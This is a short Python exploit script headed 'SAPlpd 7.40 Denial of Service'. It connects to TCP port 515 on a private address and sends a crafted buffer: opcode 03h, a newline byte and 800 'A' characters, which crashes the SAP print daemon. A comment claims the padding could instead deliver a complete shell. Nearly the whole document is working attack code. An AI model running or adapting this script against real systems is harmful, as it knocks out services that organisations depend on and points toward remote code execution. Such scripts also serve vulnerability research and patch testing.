24 lines
No EOL
715 B
Python
Executable file
24 lines
No EOL
715 B
Python
Executable file
# Exploit Title: SAPlpd 7.40 Denial of Service
|
|
# Date: 2016-12-28
|
|
# Exploit Author: Peter Baris
|
|
# Exploit code: http://saptech-erp.com.au/resources/saplpd_dos.zip
|
|
# Version: 7.40 all patch levels (as a part of SAPGui 7.40)
|
|
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64
|
|
|
|
|
|
import socket
|
|
|
|
# Opcodes 03h and 04h are vulnerable to bad characters 00h and 0ah
|
|
# So you can modify the DoS accordingly
|
|
# The added 800 A's are just to show, that you can deliver a complete shell with the command
|
|
|
|
DoS = ("\x03"+"\x0a"+"\x41"*800)
|
|
|
|
|
|
s = socket.socket()
|
|
s.settimeout(1)
|
|
s.connect(('192.168.198.132', 515))
|
|
print("[*] Crashing SAPlpd 7.40")
|
|
print("[*] Payload length: "+str(len(DoS))+" bytes")
|
|
s.send(DoS)
|
|
s.close() |